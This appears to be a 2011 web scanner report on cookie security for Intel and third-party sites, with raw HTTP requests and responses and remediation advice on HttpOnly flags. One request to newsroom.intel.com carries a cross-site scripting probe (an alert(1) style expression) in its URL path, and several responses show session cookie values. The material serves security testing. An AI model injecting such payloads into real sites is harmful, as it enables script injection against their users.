GET /sites/academic_showcase/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /<BR/ HTTP/1.1 Host: www.sigcse.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:15:20 GMT Server: Apache/2.2.11 (Unix) DAV/2 PHP/5.2.9 SVN/1.6.2 mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.26 mod_python/3.3.1 Python/2.4.4 X-Powered-By: PHP/5.2.9 Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: SESS01751fc7542c8565e6d3f32029062982=efohpkcr1poe9o8iif13jis6f0; expires=Tue, 01-Mar-2011 02:48:40 GMT; path=/; domain=.sigcse.org Last-Modified: Sat, 05 Feb 2011 23:15:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 10731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr"> <head> <meta ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /details?v=i73f0pQBfQ8 HTTP/1.1 Host: m.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
lsd=PvG3c; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Intel HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:09 GMT Content-Length: 43972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:08 GMT Content-Length: 10821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /apps/slideshow/show.swf HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:18 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=916edod6krmju&b=3&s=qs; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Last-Modified: Mon, 21 Jun 2010 23:36:27 GMT Accept-Ranges: bytes Content-Length: 118333 X-Served-By: www144.flickr.mud.yahoo.com Cache-Control: private Connection: close Content-Type: application/x-shockwave-flash
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /photos/intelphotos HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:17 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=6dgtddl6krmjt&b=3&s=ve; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 04-Feb-2014 23:17:17 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Fri, 05-Feb-2010 23:17:16 GMT; path=/; domain=flickr.com X-Served-By: www40.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 65286
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /channelintel HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:31 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=748e55c21ab77f5c42666c7de4cddc97cwsAAAAzVVOtwdbzTU3eDw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/das_captcha?next=/channelintel Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /view_play_list HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:33 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: GEO=a0eadf3d397495f055b487c9dbb220f2cwsAAAAzVVOtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/?ytsession=EDIPaPJ1NkCikKaHvniF7Tiz6vDWTKiQ2BjrzENMdu4p9NPioHcNGMGtxIJnyKsQ9R2I0ZskMRuPWAvsogbKJyMWdeu6E20vtaVqZVDrw7r_emQa58TecjXkS424salJlpG18NSZg1fKaRHRopstmT9udEtftazAtuYX5ENoz6ASKAmuR9gwuzmdsPgCvpW_exCnDvIgodEvClzCDA0RQe5zB9i1kM0ugB-9Pp7XUtYHjj1xXNi4E_xDKRXczWIf1KogmWn98Y7QdIm3PseAUQ Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 23:32:33 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 23:32:33 GMT Set-Cookie: GEO=1a33cb5129beba695e57998bcff5bd59cwsAAAAzR0KtwdbzTU3eEQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=Uq4q39XF8n9pzVE7ljERwFoh2ir4kQlnCvFfi3V86wjgkCxlmb9pqK47ZeV_AeK8Gwi_mmTUJO6EE5ehEUFOiUOwnmac1YQ8wbPkBQA-K857ZGPA4gaFu591L_HP6SJNE6Hh7IwMMjOi6R-9ReRkQSMrxmsRjs1L7joKvo52BVGDZGuL-TQEmNaQhm9iYfu8CAZG9xN5aPSB4nCO3yweeBbU07vD6c26v_7TT7mnV8W0gTeCsoe37SpcCsl47vCTo9g2wt0u8Ri5yPMrqyNc2B7GXI0DyN3Ayh3nXEwYcOfb9eUQHoN_bQ Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A7000A05012477-60000107200B4F69[CE]; Expires=Fri, 5 Feb 2016 01:57:40 GMT; Domain=.intel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:17:40 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=99d10be2a8b5824058095ee73c009e9e; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blog/2011/02/04/location-awareness-demo-qt-creator-using-qml HTTP/1.1 Host: appdeveloper.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:17:40 GMT Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Set-Cookie: SESS5a5e2306769d28180c45e44dbead8572=222cb97a2603f1b3e7ce4b3ecc102334; expires=Tue, 01-Mar-2011 02:51:00 GMT; path=/ Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 05 Feb 2011 23:17:40 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Set-Cookie: loginpt=0 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/openportit/server HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/openportit/vproexpert HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/tech HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/tech/desktop HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.jspa HTTP/1.1 Host: communities.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jquery/scrollTo/ HTTP/1.1 Host: flesler.demos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:59:27 GMT Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack) Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Status: 404 Not Found Cache-Control: no-cache Content-Length: 947 Set-Cookie: _display_manager_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--af8c11ce1971d13ddb232e31aa849f4ac245c1dc; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */ /* * * this is not a straight copy/paste from the above URL. this has been * custom modified by us. so don't go copy/paste u ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
/* overrides for elements while customizing a page */ body.jive-body-widget-customizing #jive-body #jive-body-intro, body.jive-body-widget-customizing #jive-body #jive-breadcrumb, body.jive-body-wi ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: newsroom.intel.com
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 01:56:20 GMT Server: Apache Set-Cookie: JSESSIONID=0F9AA48CBC22DD7A7D0A421E6737E14C.node7IPR; Domain=.intel.com; Path=/ Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/ X-JAL: 17 Content-Language: en-US CacheHit: D=26624 t=1296957380484009 X-JSL: D=26628 t=1296957380484009 Cache-Control: no-cache Vary: Accept-Encoding Content-Type: text/html;charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /engine/icorescript.asp?s=15&sid=&c=&geo=0&f=NONE HTTP/1.1 Host: onsite2.researchintel.com Proxy-Connection: keep-alive Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:12:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" cache-control: private pragma: no-cache Content-Length: 187 Content-Type: text/html Expires: Thu, 03 Feb 2011 23:12:18 GMT Set-Cookie: ASPSESSIONIDCSTRSASQ=DJKDPHKCHBEKBKLBIMAIHJGD; path=/ Cache-control: No-Store
The following cookie was issued by the application and does not have the HttpOnly flag set:
SESSabdcf03bfc020aa07e9f024d8c52c72f=tcttbhd60i0t3is8770gbmmcb0; expires=Tue, 01 Mar 2011 02:54:53 GMT; path=/; domain=.plugins.jquery.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /project/SimpleModal HTTP/1.1 Host: plugins.jquery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:33 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.6 Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=tcttbhd60i0t3is8770gbmmcb0; expires=Tue, 01 Mar 2011 02:54:53 GMT; path=/; domain=.plugins.jquery.com Last-Modified: Sat, 05 Feb 2011 23:21:32 GMT ETag: "a21bd565ad8681eec5d18d0535ad0a09" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cs_login HTTP/1.1 Host: secure-newsroom.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders-overview/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/01/31/everyone-has-a-dream/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/can-advisor-help-me-thread-my-code-even-if-i-use-templates/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/half-empty-dream-cup-of-concrete-roses/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/01/xss-vulnerabilities-continue-to-run-deep/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/02/meshcentralcom-new-mesh-agent-api/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/03/jeffs-notebook-a-new-joint-lifetime-and-access-synchronization-algorithm-for-shared-dynamic-objects/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/developer-tools-for-upnp-update/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/blogs/2011/02/04/location-awareness-demo-in-qt-creator-using-qml/feed/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en-us X-Pingback: http://software.intel.com/en-us/services/comment/pingback/ Date: Sat, 05 Feb 2011 23:21:40 GMT Content-Length: 20519 Connection: close Set-Cookie: PHPSESSID=a638f3cc0588735e2cef74d00d31654d; path=/; domain=intel.com Set-Cookie: loginpt=0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <head profile="http: ...[SNIP]...
